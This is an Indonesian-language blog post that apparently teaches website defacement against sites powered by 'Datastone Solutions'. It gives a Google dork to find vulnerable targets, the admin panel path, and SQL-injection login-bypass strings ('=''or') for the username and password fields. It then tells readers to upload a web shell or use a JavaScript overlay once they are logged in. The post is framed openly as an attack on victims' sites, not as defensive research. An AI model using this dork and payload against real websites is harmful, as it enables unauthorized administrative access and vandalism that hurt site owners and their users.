Thursday, 8 February 2018

Datastone Solutions Admin Login Bypass

Written by   on   in   with No comments
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer

dan sekarang saya akan membagikan cara melakukan deface dengan methode bypass admin 

 bypass admin apa?kalian bisa mencari di google

kita mulai saja 

dork: intext:"Powered By : Datastone Solutions"
exploit:/adminpanel/


disini saya sudah menemukan salah satu target 
lalu masukan 
username: '=''or'
password: '=''or'

 lalu login
dan kalian sudah masuk kedalam sebagai admin 
setelah itu kalian bisa mengupload shell kalian atau jika tidak bisa kalian bisa menggunakan teknik js overlay
Semoga dengan ini bisa membantu

 Author of the poc
Author: 0N3R1D3R
Team: Error Violence

sumber:https://cxsecurity.com/issue/WLB-2018020097
Share:

0 comments:

Post a Comment